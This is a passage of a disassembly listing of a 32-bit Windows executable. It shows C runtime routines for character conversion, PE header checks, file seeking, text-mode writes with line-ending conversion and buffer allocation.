jmp short loc_40CE5D
; ---------------------------------------------------------------------------
loc_40CE53: ; CODE XREF: sub_40CDF4+4Bj
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40CE5D: ; CODE XREF: sub_40CDF4+5Dj
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40C8A4
add esp, 20h
test eax, eax
jnz short loc_40CE93
cmp [ebp+var_C], al
jz short loc_40CE8F
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40CE8F: ; CODE XREF: sub_40CDF4+92j
xor eax, eax
jmp short loc_40CEA7
; ---------------------------------------------------------------------------
loc_40CE93: ; CODE XREF: sub_40CDF4+8Dj
movzx eax, [ebp+var_4]
loc_40CE97: ; CODE XREF: sub_40CDF4+2Cj
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40CEA7
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40CEA7: ; CODE XREF: sub_40CDF4+9Dj
; sub_40CDF4+AAj
pop ebx
leave
retn
sub_40CDF4 endp
; =============== S U B R O U T I N E =======================================
sub_40CEAA proc near ; CODE XREF: sub_407EC9+Fp
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_427F7C, eax
retn
sub_40CEAA endp
; ---------------------------------------------------------------------------
loc_40CEB4: ; DATA XREF: sub_40CEC4:loc_40CF29o
push dword ptr [esp+4]
call ds:off_41D11C
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEC4 proc near ; CODE XREF: sub_405C31+26p
; sub_405CE4+78p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_421AA0
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push dword_427F7C
call sub_405543
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_40CF3A
lea eax, [ebp+var_1C]
push eax
call sub_407CB6
pop ecx
cmp eax, edi
jz short loc_40CF02
push edi
push edi
push edi
push edi
push edi
call sub_403209
add esp, 14h
loc_40CF02: ; CODE XREF: sub_40CEC4+2Fj
cmp [ebp+var_1C], 1
jz short loc_40CF29
push offset aKernel32_dl_10 ; "kernel32.dll"
call ds:dword_41D0E0 ; GetModuleHandleA
cmp eax, edi
jz short loc_40CF29
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:off_41D0E8
mov esi, eax
cmp esi, edi
jnz short loc_40CF2E
loc_40CF29: ; CODE XREF: sub_40CEC4+42j
; sub_40CEC4+51j
mov esi, offset loc_40CEB4
loc_40CF2E: ; CODE XREF: sub_40CEC4+63j
push esi
call sub_4054D7
pop ecx
mov dword_427F7C, eax
loc_40CF3A: ; CODE XREF: sub_40CEC4+21j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; MultiByteToWideChar
mov [ebp+var_20], eax
jmp short loc_40CF79
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_40CF75
push 8
call ds:dword_41D170 ; RtlRestoreLastWin32Error
loc_40CF75: ; CODE XREF: sub_40CEC4+A7j
and [ebp+var_20], 0
loc_40CF79: ; CODE XREF: sub_40CEC4+84j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_40CEC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CF90 proc near ; CODE XREF: sub_40D002+16p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_40CF9E
loc_40CF9B: ; CODE XREF: sub_40CF90+19j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF90+9j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_40CF9B
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_40CF90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CFC0 proc near ; CODE XREF: sub_40D002+27p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40CFFC
mov edi, [esp+0Ch+arg_4]
loc_40CFE2: ; CODE XREF: sub_40CFC0+3Aj
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_40CFF2
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40CFFE
loc_40CFF2: ; CODE XREF: sub_40CFC0+27j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_40CFE2
loc_40CFFC: ; CODE XREF: sub_40CFC0+1Cj
xor eax, eax
loc_40CFFE: ; CODE XREF: sub_40CFC0+30j
pop edi
pop esi
pop ebx
retn
sub_40CFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D002 proc near ; CODE XREF: sub_4069F0+FFp
; sub_407D29+Ep ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421AC0
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
mov edx, 400000h
push edx
call sub_40CF90
pop ecx
test eax, eax
jz short loc_40D05F
mov eax, [ebp+arg_0]
sub eax, edx
push eax
push edx
call sub_40CFC0
pop ecx
pop ecx
test eax, eax
jz short loc_40D05F
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_40D068
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
xor ecx, ecx
cmp eax, 0C0000005h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40D05F: ; CODE XREF: sub_40D002+1Ej
; sub_40D002+30j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
xor eax, eax
loc_40D068: ; CODE XREF: sub_40D002+44j
call __SEH_epilog4
retn
sub_40D002 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D06E proc near ; CODE XREF: sub_40A15D+2EEp
; sub_40A15D+3C8p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_40F12D
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_40D0A3
call sub_405B83
mov dword ptr [eax], 9
loc_40D09D: ; CODE XREF: sub_40D06E+5Ej
mov eax, edi
mov edx, edi
jmp short loc_40D0ED
; ---------------------------------------------------------------------------
loc_40D0A3: ; CODE XREF: sub_40D06E+22j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:off_41D074
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40D0CE
call ds:dword_41D0EC ; RtlGetLastWin32Error
test eax, eax
jz short loc_40D0CE
push eax
call sub_405BA9
pop ecx
jmp short loc_40D09D
; ---------------------------------------------------------------------------
loc_40D0CE: ; CODE XREF: sub_40D06E+4Bj
; sub_40D06E+55j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_435820[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_40D0ED: ; CODE XREF: sub_40D06E+33j
pop edi
pop esi
leave
retn
sub_40D06E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D0F1 proc near ; CODE XREF: sub_406B86+116p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset dword_421AE0
call __SEH_prolog4
or esi, 0FFFFFFFFh
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D12A
call sub_405B96
and dword ptr [eax], 0
call sub_405B83
mov dword ptr [eax], 9
loc_40D121: ; CODE XREF: sub_40D0F1+66j
mov eax, esi
mov edx, esi
jmp loc_40D1FA
; ---------------------------------------------------------------------------
loc_40D12A: ; CODE XREF: sub_40D0F1+1Bj
xor edi, edi
cmp eax, edi
jl short loc_40D138
cmp eax, dword_435808
jb short loc_40D159
loc_40D138: ; CODE XREF: sub_40D0F1+3Dj
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
jmp short loc_40D121
; ---------------------------------------------------------------------------
loc_40D159: ; CODE XREF: sub_40D0F1+45j
mov ecx, eax
sar ecx, 5
lea ebx, ds:435820h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jnz short loc_40D19F
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
or edx, 0FFFFFFFFh
mov eax, edx
jmp short loc_40D1FA
; ---------------------------------------------------------------------------
loc_40D19F: ; CODE XREF: sub_40D0F1+86j
push eax
call sub_40F19E
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D1CE
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D06E
add esp, 10h
mov [ebp+var_24], eax
mov [ebp+var_20], edx
jmp short loc_40D1E8
; ---------------------------------------------------------------------------
loc_40D1CE: ; CODE XREF: sub_40D0F1+BFj
call sub_405B83
mov dword ptr [eax], 9
call sub_405B96
mov [eax], edi
or [ebp+var_24], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
loc_40D1E8: ; CODE XREF: sub_40D0F1+DBj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D200
mov eax, [ebp+var_24]
mov edx, [ebp+var_20]
loc_40D1FA: ; CODE XREF: sub_40D0F1+34j
; sub_40D0F1+ACj
call __SEH_epilog4
retn
sub_40D0F1 endp
; =============== S U B R O U T I N E =======================================
sub_40D200 proc near ; CODE XREF: sub_40D0F1+FEp
; DATA XREF: fabskl8p:00421AF8o
push dword ptr [ebp+8]
call sub_40F23E
pop ecx
retn
sub_40D200 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=518h
sub_40D20A proc near ; CODE XREF: sub_40D7D0+9Ap
; sub_410957+BBp
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_56D = byte ptr -56Dh
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_410 = byte ptr -410h
var_160 = byte ptr -160h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-518h]
sub esp, 594h
mov eax, dword_423064
xor eax, ebp
mov [ebp+518h+var_4], eax
mov eax, [ebp+518h+arg_4]
push esi
xor esi, esi
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_57C], eax
mov [ebp+518h+var_578], esi
mov [ebp+518h+var_580], esi
jnz short loc_40D246
xor eax, eax
jmp loc_40D7BA
; ---------------------------------------------------------------------------
loc_40D246: ; CODE XREF: sub_40D20A+33j
cmp eax, esi
jnz short loc_40D271
call sub_405B96
mov [eax], esi
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40D7BA
; ---------------------------------------------------------------------------
loc_40D271: ; CODE XREF: sub_40D20A+3Ej
mov esi, [ebp+518h+arg_0]
push ebx
mov ebx, esi
and ebx, 1Fh
imul ebx, 28h
mov eax, esi
sar eax, 5
push edi
lea edi, ds:435820h[eax*4]
mov eax, [edi]
add eax, ebx
mov cl, [eax+24h]
add cl, cl
sar cl, 1
cmp cl, 2
mov [ebp+518h+var_588], edi
mov [ebp+518h+var_56D], cl
jz short loc_40D2A8
cmp cl, 1
jnz short loc_40D2DB
loc_40D2A8: ; CODE XREF: sub_40D20A+97j
mov ecx, [ebp+518h+arg_8]
not ecx
test cl, 1
jnz short loc_40D2DB
call sub_405B96
xor esi, esi
mov [eax], esi
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
jmp loc_40D7B0
; ---------------------------------------------------------------------------
loc_40D2DB: ; CODE XREF: sub_40D20A+9Cj
; sub_40D20A+A9j
test byte ptr [eax+4], 20h
jz short loc_40D2F0
push 2
push 0
push 0
push esi
call sub_40D06E
add esp, 10h
loc_40D2F0: ; CODE XREF: sub_40D20A+D5j
push esi
call sub_40D8F0
test eax, eax
pop ecx
jz loc_40D4F5
mov eax, [edi]
test byte ptr [ebx+eax+4], 80h
jz loc_40D4F5
call sub_40574D
mov eax, [eax+6Ch]
xor ecx, ecx
cmp [eax+14h], ecx
lea eax, [ebp+518h+var_594]
setz cl
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
mov esi, ecx
call ds:off_41D114
test eax, eax
jz loc_40D4F5
test esi, esi
jz short loc_40D343
cmp [ebp+518h+var_56D], 0
jz loc_40D4F5
loc_40D343: ; CODE XREF: sub_40D20A+12Dj
call ds:off_41D118
and [ebp+518h+var_568], 0
cmp [ebp+518h+arg_8], 0
mov esi, [ebp+518h+var_57C]
mov [ebp+518h+var_594], eax
mov [ebp+518h+var_58C], esi
jbe loc_40D762
and [ebp+518h+var_574], 0
jmp short loc_40D36C
; ---------------------------------------------------------------------------
loc_40D369: ; CODE XREF: sub_40D20A+2E0j
mov esi, [ebp+518h+var_58C]
loc_40D36C: ; CODE XREF: sub_40D20A+15Dj
mov al, [ebp+518h+var_56D]
test al, al
jnz loc_40D47D
mov al, [esi]
xor ecx, ecx
cmp al, 0Ah
setz cl
movsx eax, al
push eax
mov [ebp+518h+var_590], ecx
call sub_40CDE6
test eax, eax
pop ecx
jnz short loc_40D3AB
push 1
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F880
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D758
jmp short loc_40D3DB
; ---------------------------------------------------------------------------
loc_40D3AB: ; CODE XREF: sub_40D20A+185j
mov eax, [ebp+518h+var_57C]
sub eax, esi
add eax, [ebp+518h+arg_8]
cmp eax, 1
jbe loc_40D758
push 2
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F880
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D758
inc esi
inc [ebp+518h+var_574]
loc_40D3DB: ; CODE XREF: sub_40D20A+19Fj
xor eax, eax
push eax
push eax
push 5
lea ecx, [ebp+518h+var_C]
push ecx
push 1
lea ecx, [ebp+518h+var_56C]
push ecx
push eax
push [ebp+518h+var_594]
inc esi
inc [ebp+518h+var_574]
mov [ebp+518h+var_58C], esi
call ds:dword_41D134 ; WideCharToMultiByte
mov esi, eax
test esi, esi
jz loc_40D758
push 0
lea eax, [ebp+518h+var_568]
push eax
push esi
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:off_41D088
test eax, eax
jz loc_40D74F
mov eax, [ebp+518h+var_568]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D758
cmp [ebp+518h+var_590], 0
jz loc_40D4E1
push 0
lea eax, [ebp+518h+var_568]
push eax
push 1
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
mov [ebp+518h+var_C], 0Dh
push dword ptr [ebx+eax]
call ds:off_41D088
test eax, eax
jz loc_40D74F
cmp [ebp+518h+var_568], 1
jl loc_40D758
inc [ebp+518h+var_580]
inc [ebp+518h+var_578]
jmp short loc_40D4E1
; ---------------------------------------------------------------------------
loc_40D47D: ; CODE XREF: sub_40D20A+167j
cmp al, 1
jz short loc_40D485
cmp al, 2
jnz short loc_40D4A0
loc_40D485: ; CODE XREF: sub_40D20A+275j
movzx ecx, word ptr [esi]
xor edx, edx
cmp cx, 0Ah
setz dl
inc esi
inc esi
add [ebp+518h+var_574], 2
mov [ebp+518h+var_56C], ecx
mov [ebp+518h+var_58C], esi
mov [ebp+518h+var_590], edx
loc_40D4A0: ; CODE XREF: sub_40D20A+279j
cmp al, 1
jz short loc_40D4A8
cmp al, 2
jnz short loc_40D4E1
loc_40D4A8: ; CODE XREF: sub_40D20A+298j
push [ebp+518h+var_56C]
call sub_41088C
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D74F
inc [ebp+518h+var_578]
cmp [ebp+518h+var_590], 0
jz short loc_40D4E1
push 0Dh
pop eax
push eax
mov [ebp+518h+var_56C], eax
call sub_41088C
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D74F
inc [ebp+518h+var_578]
inc [ebp+518h+var_580]
loc_40D4E1: ; CODE XREF: sub_40D20A+232j
; sub_40D20A+271j ...
mov eax, [ebp+518h+arg_8]
cmp [ebp+518h+var_574], eax
jb loc_40D369
jmp loc_40D758
; ---------------------------------------------------------------------------
loc_40D4F5: ; CODE XREF: sub_40D20A+EFj
; sub_40D20A+FCj ...
mov eax, [edi]
add eax, ebx
test byte ptr [eax+4], 80h
jz loc_40D728
mov eax, [ebp+518h+var_57C]
xor esi, esi
cmp [ebp+518h+var_56D], 0
mov [ebp+518h+var_56C], esi
jnz loc_40D5A6
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D789
loc_40D524: ; CODE XREF: sub_40D20A+395j
mov ecx, [ebp+518h+var_568]
and [ebp+518h+var_574], 0
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D531: ; CODE XREF: sub_40D20A+354j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D560
mov edx, [ebp+518h+var_568]
inc [ebp+518h+var_568]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_40D551
inc [ebp+518h+var_580]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+518h+var_574]
loc_40D551: ; CODE XREF: sub_40D20A+33Bj
mov [eax], dl
inc eax
inc [ebp+518h+var_574]
cmp [ebp+518h+var_574], 400h
jb short loc_40D531
loc_40D560: ; CODE XREF: sub_40D20A+32Dj
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:off_41D088
test eax, eax
jz loc_40D74F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D758
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb short loc_40D524
jmp loc_40D758
; ---------------------------------------------------------------------------
loc_40D5A6: ; CODE XREF: sub_40D20A+305j
cmp [ebp+518h+var_56D], 2
jnz loc_40D64D
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D789
loc_40D5BF: ; CODE XREF: sub_40D20A+438j
mov ecx, [ebp+518h+var_568]
xor esi, esi
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D5CA: ; CODE XREF: sub_40D20A+3F7j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D603
mov edx, [ebp+518h+var_568]
add [ebp+518h+var_568], 2
movzx edx, word ptr [edx]
inc ecx
inc ecx
cmp dx, 0Ah
jnz short loc_40D5F1
add [ebp+518h+var_580], 2
mov word ptr [eax], 0Dh
inc eax
inc eax
inc esi
inc esi
loc_40D5F1: ; CODE XREF: sub_40D20A+3D8j
mov edi, [ebp+518h+var_588]
mov [eax], dx
inc eax
inc eax
inc esi
inc esi
cmp esi, 3FFh
jb short loc_40D5CA
loc_40D603: ; CODE XREF: sub_40D20A+3C6j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:off_41D088
test eax, eax
jz loc_40D74F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D758
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb loc_40D5BF
jmp loc_40D758
; ---------------------------------------------------------------------------
loc_40D64D: ; CODE XREF: sub_40D20A+3A0j
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_574], eax
jbe loc_40D789
loc_40D65C: ; CODE XREF: sub_40D20A+516j
mov ecx, [ebp+518h+var_574]
and [ebp+518h+var_568], 0
sub ecx, [ebp+518h+var_57C]
push 2
lea eax, [ebp+518h+var_160]
pop esi
loc_40D66F: ; CODE XREF: sub_40D20A+497j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D6A3
mov edx, [ebp+518h+var_574]
movzx edx, word ptr [edx]
add [ebp+518h+var_574], esi
add ecx, esi
cmp dx, 0Ah
jnz short loc_40D692
mov word ptr [eax], 0Dh
add eax, esi
add [ebp+518h+var_568], esi
loc_40D692: ; CODE XREF: sub_40D20A+47Cj
add [ebp+518h+var_568], esi
mov [eax], dx
add eax, esi
cmp [ebp+518h+var_568], 152h
jb short loc_40D66F
loc_40D6A3: ; CODE XREF: sub_40D20A+46Bj
xor esi, esi
push esi
push esi
push 2ABh
lea ecx, [ebp+518h+var_410]
push ecx
lea ecx, [ebp+518h+var_160]
sub eax, ecx
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, ecx
push eax
push esi
push 0FDE9h
call ds:dword_41D134 ; WideCharToMultiByte
mov edi, eax
cmp edi, esi
jz short loc_40D74F
loc_40D6D6: ; CODE XREF: sub_40D20A+4F6j
push 0
lea eax, [ebp+518h+var_584]
push eax
mov eax, edi
sub eax, esi
push eax
lea eax, [ebp+esi+518h+var_410]
push eax
mov eax, [ebp+518h+var_588]
mov eax, [eax]
push dword ptr [ebx+eax]
call ds:off_41D088
test eax, eax
jz short loc_40D704
add esi, [ebp+518h+var_584]
cmp edi, esi
jg short loc_40D6D6
jmp short loc_40D70D
; ---------------------------------------------------------------------------
loc_40D704: ; CODE XREF: sub_40D20A+4EFj
call ds:dword_41D0EC ; RtlGetLastWin32Error
mov [ebp+518h+var_56C], eax
loc_40D70D: ; CODE XREF: sub_40D20A+4F8j
cmp edi, esi
jg short loc_40D758
mov eax, [ebp+518h+var_574]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
mov [ebp+518h+var_578], eax
jb loc_40D65C
jmp short loc_40D758
; ---------------------------------------------------------------------------
loc_40D728: ; CODE XREF: sub_40D20A+2F3j
push 0
lea ecx, [ebp+518h+var_584]
push ecx
push [ebp+518h+arg_8]
push [ebp+518h+var_57C]
push dword ptr [eax]
call ds:off_41D088
test eax, eax
jz short loc_40D74F
mov eax, [ebp+518h+var_584]
and [ebp+518h+var_56C], 0
mov [ebp+518h+var_578], eax
jmp short loc_40D758
; ---------------------------------------------------------------------------
loc_40D74F: ; CODE XREF: sub_40D20A+21Aj
; sub_40D20A+25Bj ...
call ds:dword_41D0EC ; RtlGetLastWin32Error
mov [ebp+518h+var_56C], eax
loc_40D758: ; CODE XREF: sub_40D20A+199j
; sub_40D20A+1AFj ...
mov eax, [ebp+518h+var_578]
test eax, eax
jnz short loc_40D7B5
mov edi, [ebp+518h+var_588]
loc_40D762: ; CODE XREF: sub_40D20A+153j
xor esi, esi
cmp [ebp+518h+var_56C], esi
jz short loc_40D789
push 5
pop esi
cmp [ebp+518h+var_56C], esi
jnz short loc_40D77E
call sub_405B83
mov dword ptr [eax], 9
jmp short loc_40D7A9
; ---------------------------------------------------------------------------
loc_40D77E: ; CODE XREF: sub_40D20A+565j
push [ebp+518h+var_56C]
call sub_405BA9
pop ecx
jmp short loc_40D7B0
; ---------------------------------------------------------------------------
loc_40D789: ; CODE XREF: sub_40D20A+314j
; sub_40D20A+3AFj ...
mov eax, [edi]
test byte ptr [ebx+eax+4], 40h
jz short loc_40D79E
mov eax, [ebp+518h+var_57C]
cmp byte ptr [eax], 1Ah
jnz short loc_40D79E
xor eax, eax
jmp short loc_40D7B8
; ---------------------------------------------------------------------------
loc_40D79E: ; CODE XREF: sub_40D20A+586j
; sub_40D20A+58Ej
call sub_405B83
mov dword ptr [eax], 1Ch
loc_40D7A9: ; CODE XREF: sub_40D20A+572j
call sub_405B96
mov [eax], esi
loc_40D7B0: ; CODE XREF: sub_40D20A+CCj
; sub_40D20A+57Dj
or eax, 0FFFFFFFFh
jmp short loc_40D7B8
; ---------------------------------------------------------------------------
loc_40D7B5: ; CODE XREF: sub_40D20A+553j
sub eax, [ebp+518h+var_580]
loc_40D7B8: ; CODE XREF: sub_40D20A+592j
; sub_40D20A+5A9j
pop edi
pop ebx
loc_40D7BA: ; CODE XREF: sub_40D20A+37j
; sub_40D20A+62j
mov ecx, [ebp+518h+var_4]
xor ecx, ebp
pop esi
call sub_402ADC
add ebp, 518h
leave
retn
sub_40D20A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7D0 proc near ; CODE XREF: sub_406B86+CBp
; sub_406B86+13Ap ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_421B00
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D7FF
call sub_405B96
and dword ptr [eax], 0
call sub_405B83
mov dword ptr [eax], 9
loc_40D7F7: ; CODE XREF: sub_40D7D0+5Cj
or eax, 0FFFFFFFFh
jmp loc_40D89C
; ---------------------------------------------------------------------------
loc_40D7FF: ; CODE XREF: sub_40D7D0+12j
xor edi, edi
cmp eax, edi
jl short loc_40D80D
cmp eax, dword_435808
jb short loc_40D82E
loc_40D80D: ; CODE XREF: sub_40D7D0+33j
; sub_40D7D0+7Cj
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
jmp short loc_40D7F7
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7D0+3Bj
mov ecx, eax
sar ecx, 5
lea ebx, ds:435820h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40D80D
push eax
call sub_40F19E
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D877
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D20A
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40D88D
; ---------------------------------------------------------------------------
loc_40D877: ; CODE XREF: sub_40D7D0+8Fj
call sub_405B83
mov dword ptr [eax], 9
call sub_405B96
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40D88D: ; CODE XREF: sub_40D7D0+A5j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D8A2
mov eax, [ebp+var_1C]
loc_40D89C: ; CODE XREF: sub_40D7D0+2Aj
call __SEH_epilog4
retn
sub_40D7D0 endp
; =============== S U B R O U T I N E =======================================
sub_40D8A2 proc near ; CODE XREF: sub_40D7D0+C4p
; DATA XREF: fabskl8p:00421B18o
push dword ptr [ebp+8]
call sub_40F23E
pop ecx
retn
sub_40D8A2 endp
; =============== S U B R O U T I N E =======================================
sub_40D8AC proc near ; CODE XREF: sub_406B86+9Cp
; sub_40A03D+58p ...
arg_0 = dword ptr 4
inc dword_427B28
push 1000h
call sub_407AEA
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_40D8D5
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_40D8E6
; ---------------------------------------------------------------------------
loc_40D8D5: ; CODE XREF: sub_40D8AC+1Aj
